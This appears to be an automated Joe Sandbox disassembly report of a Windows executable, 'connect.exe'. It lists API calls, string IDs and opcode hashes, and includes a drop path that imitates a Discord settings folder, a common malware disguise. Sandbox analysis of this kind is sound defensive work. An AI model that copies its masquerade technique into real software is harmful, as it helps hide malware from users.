                                                            • RtlUnwind.KERNEL32(?,004195E9,00000000,00000000,?,00000001,?,?), ref: 004195E3
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritableUnwind___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 2164997444-1018135373
                                                            • Opcode ID: 98d011fd85a43c43195082c4c331a370ed1cfa35abd3f11007cd7c76bea82d12
                                                            • Instruction ID: 79ae2a4567aa8e04c6265be7f1f0a888140857a70f349d61d8ea1e17c7dfc9ea
                                                            • Opcode Fuzzy Hash: 98d011fd85a43c43195082c4c331a370ed1cfa35abd3f11007cd7c76bea82d12
                                                            • Instruction Fuzzy Hash: C341F635A01208BBCF11DF69D860ADE7BB5EF45328F14816BE8146B351D739DE82CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNEL32(00000064,00000000,SetEnvironment,00430ECC), ref: 0040A1D6
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle$\}B
                                                            • API String ID: 3472027048-4115378676
                                                            • Opcode ID: ae2ff29c1d8d4bd9679e6c2a48ee91b9128e84e6f5896222fad7da7b4a482fc2
                                                            • Instruction ID: bedb00c804a9dce52fb042db9870be84169c93686b5bf65811986762a050c4d9
                                                            • Opcode Fuzzy Hash: ae2ff29c1d8d4bd9679e6c2a48ee91b9128e84e6f5896222fad7da7b4a482fc2
                                                            • Instruction Fuzzy Hash: 8C513D7174430656EB24BBA5AC5376A33A0AB60718F20413FF601BA2D2EBFD4865C61F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDC.USER32(?), ref: 004080F7
                                                            • GetSystemMetrics.USER32(0000000B), ref: 00408110
                                                            • GetSystemMetrics.USER32(0000003D), ref: 00408119
                                                            • GetSystemMetrics.USER32(0000003E), ref: 00408122
                                                            • SelectObject.GDI32(00000000,00000850), ref: 0040813E
                                                            • DrawTextW.USER32(00000000,?,000000FF,?,?), ref: 00408157
                                                            • SelectObject.GDI32(00000000,?), ref: 0040817E
                                                            • ReleaseDC.USER32(?,00000000), ref: 0040818B
                                                            Similarity
                                                            • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                            • String ID:
                                                            • API String ID: 2466489532-0
                                                            • Opcode ID: f6820cb6413f390631b252b691c9a3c0af8269733a29a03566abed7387fb7d31
                                                            • Instruction ID: 8b90712e8116e0942533d6e77e0129b97645ce25513bc7813625e55a2880145a
                                                            • Opcode Fuzzy Hash: f6820cb6413f390631b252b691c9a3c0af8269733a29a03566abed7387fb7d31
                                                            • Instruction Fuzzy Hash: 95212FB2600315AFCB20DF69DD4898ABBF8EF08360B12856AF559E72A0D774E941CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCPInfo.KERNEL32(?,?), ref: 00422AE5
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00422B68
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00422BDE
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00422BF5
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00422C59
                                                            • __freea.LIBCMT ref: 00422C84
                                                            • __freea.LIBCMT ref: 00422C90
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                            • String ID:
                                                            • API String ID: 2829977744-0
                                                            • Opcode ID: 6d28d3358b3276e0d94c3f0f3136fb53172ae4671ca37385b52b2fdc8a551ba5
                                                            • Instruction ID: 8285bbd09ef7b0c0ee5c57fc5ccfd74ba8cf8c46fcdc3056a30fc4808705d79e
                                                            • Opcode Fuzzy Hash: 6d28d3358b3276e0d94c3f0f3136fb53172ae4671ca37385b52b2fdc8a551ba5
                                                            • Instruction Fuzzy Hash: C181E271F00236BFDF219E65AA41AEF7BB5EF49310F98411BE801E7240D6A99C41C7A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,00000001,00000020,?,?,?,?,?,?,?,00422311,00000008,00000001,00000020,0000002C,?), ref: 00421BC7
                                                            • __fassign.LIBCMT ref: 00421C46
                                                            • __fassign.LIBCMT ref: 00421C65
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 00421C92
                                                            • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00422311), ref: 00421CB2
                                                            • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00422311), ref: 00421CEC
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: a93bca8180c44db9697705af62f72fc56a01868df3ecc104863cc3e86e09c5d9
                                                            • Instruction ID: 332ff65ea62ea24fc713ba3a269693ca747d236056c4f5bde2047378310aa8af
                                                            • Opcode Fuzzy Hash: a93bca8180c44db9697705af62f72fc56a01868df3ecc104863cc3e86e09c5d9
                                                            • Instruction Fuzzy Hash: C651C774E10249EFCB10CFA4E885AEEBBF8EF19300F54452BE555E7251E734A941CB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004098D1
                                                            • GetDlgItem.USER32(?,000004B8), ref: 004098EE
                                                            • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004098FD
                                                            • wsprintfW.USER32 ref: 0040991B
                                                            • GetDlgItem.USER32(?,000004B5), ref: 00409939
                                                            Similarity
                                                            • API ID: Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                            • String ID: %d%%
                                                            • API String ID: 3151147563-1518462796
                                                            • Opcode ID: 868e86fb4d4d510285bfe777ea5755b65d80a978a047cb7e6f415effcfd695f0
                                                            • Instruction ID: f637d2492de31c1229f854405fa60f11d38a80dd1f2d17639c67080499e9bd2d
                                                            • Opcode Fuzzy Hash: 868e86fb4d4d510285bfe777ea5755b65d80a978a047cb7e6f415effcfd695f0
                                                            • Instruction Fuzzy Hash: 1131A2B1600704BFDB11EBA1DD95EDAB7A9FF08704F00442EF642A26A1DB79ED10DB18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: wsprintf
                                                            • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!$`mB
                                                            • API String ID: 2111968516-1077897382
                                                            • Opcode ID: 7e8f41af8b7525ddbd871761bbf098a9df9138694012cf0490a6cf2d44a747b2
                                                            • Instruction ID: 7b5f0b34343c5af48474d793ec4b68a35cb49d3135a87e0c1221adfa52b08ffb
                                                            • Opcode Fuzzy Hash: 7e8f41af8b7525ddbd871761bbf098a9df9138694012cf0490a6cf2d44a747b2
                                                            • Instruction Fuzzy Hash: 5C21A374B00119BBCF21ABB2DC65DDE776DEF84314F14011FF902A3291CB7DAA418AA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID:
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 0-537541572
                                                            • Opcode ID: 4565154400d9fc70af5efe327cec3f0fadc2ef8f65c9b06ea84ad47489cc6ac3
                                                            • Instruction ID: 85049474143f3b65f29a43d7abd6339aecefbb44fdab7cfa6a52ed89712df6c7
                                                            • Opcode Fuzzy Hash: 4565154400d9fc70af5efe327cec3f0fadc2ef8f65c9b06ea84ad47489cc6ac3
                                                            • Instruction Fuzzy Hash: 1A21EBF2F15225ABC7318A299C41BAB37589F027A4F150623FC05A7390D738EC81C6ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 00409D85
                                                            • GetDC.USER32(00000000), ref: 00409D90
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00409D9B
                                                            • MulDiv.KERNEL32(?,00000048,00000000), ref: 00409DAA
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409DB8
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00409DE0
                                                            • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00009AA1), ref: 00409E15
                                                            Similarity
                                                            • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystem
                                                            • String ID:
                                                            • API String ID: 3212456201-0
                                                            • Opcode ID: b8afe462444f894fa9437bb02f35f88efc33852da598584541394ca880ad6f26
                                                            • Instruction ID: 41a3572038c45cd95c6219dd3bd3f303ac6d380be5344806ae0eefe7e77ce253
                                                            • Opcode Fuzzy Hash: b8afe462444f894fa9437bb02f35f88efc33852da598584541394ca880ad6f26
                                                            • Instruction Fuzzy Hash: 4C21C375640214AFE7219B21DC49EFB7B7CEF86705F0400AAFE05A2291D7744E85CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00420408: _free.LIBCMT ref: 0042042D
                                                            • _free.LIBCMT ref: 0042048E
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 00420499
                                                            • _free.LIBCMT ref: 004204A4
                                                            • _free.LIBCMT ref: 004204F8
                                                            • _free.LIBCMT ref: 00420503
                                                            • _free.LIBCMT ref: 0042050E
                                                            • _free.LIBCMT ref: 00420519
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EndDialog.USER32(?,00000000), ref: 00408590
                                                            • KillTimer.USER32(?,00000001), ref: 0040859F
                                                            • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004085CA
                                                            • SuspendThread.KERNEL32(00000358), ref: 004085E4
                                                            • ResumeThread.KERNEL32(00000358), ref: 00408602
                                                            • EndDialog.USER32(?,00000000), ref: 00408625
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: DialogThreadTimer$KillResumeSuspend
                                                            • String ID:
                                                            • API String ID: 4151135813-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,0041F71C,00000000,?,?,?,004211A8,?,?,00000100), ref: 00420FE8
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,004211A8,?,?,00000100,5EFC4D8B,?,?), ref: 00421051
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00421131
                                                            • __freea.LIBCMT ref: 0042113E
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            • __freea.LIBCMT ref: 00421147
                                                            • __freea.LIBCMT ref: 0042116C
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00417F39,00417722), ref: 00417F50
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00417F5E
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00417F77
                                                            • SetLastError.KERNEL32(00000000,?,00417F39,00417722), ref: 00417FC9
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0041BDED,00000002,?,0041BDB5,00000003,0041BA09), ref: 0041BE5C
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041BE6F
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0041BDED,00000002,?,0041BDB5,00000003,0041BA09), ref: 0041BE92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(uxtheme,?,00408A54,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00408392
                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 004083A3
                                                            • GetWindow.USER32(?,00000005), ref: 004083C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProcWindow
                                                            • String ID: SetWindowTheme$uxtheme
                                                            • API String ID: 1082215438-1369271589
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: SetEnvironment$`fB${\rtf
                                                            • API String ID: 0-3352311804
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041F862
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F885
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041F8AB
                                                            • _free.LIBCMT ref: 0041F8BE
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F8CD
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,0041CFC8,0041DFEF,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253), ref: 0041D5A6
                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0041CFC8,0041DFEF,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D), ref: 0041D5CC
                                                            • _free.LIBCMT ref: 0041D60C
                                                            • _free.LIBCMT ref: 0041D63F
                                                            • SetLastError.KERNEL32(00000000,0040126C,?,00401867), ref: 0041D64C
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,0041B037,00000000,00000002,hC@,0041A973,hC@,00000000,00000001,00426DB8,?,0000000A,00000001), ref: 0041D457
                                                            • _free.LIBCMT ref: 0041D4AE
                                                            • _free.LIBCMT ref: 0041D4E2
                                                            • SetLastError.KERNEL32(00000000,00000000,00000006,000000FF,?,0000000A,00000001,?,?,00404368), ref: 0041D4EF
                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0000000A,00000001,?,?,00404368), ref: 0041D4FB
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 004203B7
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 004203C9
                                                            • _free.LIBCMT ref: 004203DB
                                                            • _free.LIBCMT ref: 004203ED
                                                            • _free.LIBCMT ref: 004203FF
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B6), ref: 004097FF
                                                            • SetFocus.USER32(00000000,?,00000000,?,00407D6E,?), ref: 00409802
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00409812
                                                              • Part of subcall function 004099F0: SetWindowTextW.USER32(?,00000000), ref: 004099F9
                                                            • GetDlgItem.USER32(?,000004B6), ref: 0040982A
                                                            • SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 00409834
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Item$FocusMessageSendTextWindow
                                                            • String ID:
                                                            • API String ID: 3590784419-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                            • API String ID: 0-390259182
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00407D2F
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00407D4C
                                                            • SHGetMalloc.SHELL32(00000000), ref: 00407D76
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 004097FF
                                                              • Part of subcall function 004097EB: SetFocus.USER32(00000000,?,00000000,?,00407D6E,?), ref: 00409802
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 00409812
                                                              • Part of subcall function 004097EB: GetDlgItem.USER32(?,000004B6), ref: 0040982A
                                                              • Part of subcall function 004097EB: SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 00409834
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Item$BrowseFocusFolderFromListMallocMessagePathSend
                                                            • String ID: A
                                                            • API String ID: 3792050300-3554254475
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,00000001,?,?,00000001,?), ref: 0042056C
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000001,?,?,?,?,00000001,?,?,00000001,?), ref: 004205E1
                                                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,?,00000001,?,?,00000001,?), ref: 004205F3
                                                            • __freea.LIBCMT ref: 004205FC
                                                              • Part of subcall function 0041DFAC: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041990C,?,?,004114AF,00000008,?,00407C5D,?,00401253,?,0040126C), ref: 0041DFDE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408D46
                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408D62
                                                            • GetDlgItem.USER32(?,000004B7), ref: 00408D75
                                                            • SetWindowLongW.USER32(00000000,000000FC,Function_00007D9B), ref: 00408D83
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                              • Part of subcall function 00408775: LoadIconW.USER32(00000000), ref: 0040879F
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                              • Part of subcall function 00408775: LoadImageW.USER32(00000000), ref: 004087C6
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
